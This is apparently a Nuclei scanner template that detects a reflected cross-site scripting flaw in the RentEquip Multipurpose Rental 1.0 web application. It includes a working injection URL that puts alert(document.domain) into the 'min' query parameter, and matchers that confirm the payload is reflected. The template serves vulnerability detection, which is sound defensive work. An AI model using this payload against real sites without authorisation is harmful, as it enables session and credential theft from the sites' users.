id: rentequip-xss

info:
  name: RentEquip Multipurpose Rental 1.0 - Cross Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials.
  reference:
    - https://vulners.com/packetstorm/PACKETSTORM:173002
    - https://www.exploitalert.com/view-details.html?id=39611
    - https://codecanyon.net/user/kreativdev/portfolio
  metadata:
    verified: true
    max-request: 1
  tags: xss,unauth

http:
  - method: GET
    path:
      - "{{BaseURL}}/shop/products?category=cordless-tools&min=1026553%3balert(document.domain)%2f%2f772"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "rentequip") && contains(body, "1026553;alert(document.domain)//772")'
          - 'contains(content_type, "text/html")'
        condition: and

# digest: 4a0a004730450221008b701c97ba38b01ae7329af87831819b6283c8ee98ff7efa4af0cae2e8bf8aaa0220565cb3c544577c6ed3e54079ec86d7b4cd893d0a369f3df9d66b62a0ff423c3a:922c64590222798bb761d5b6d8e72950
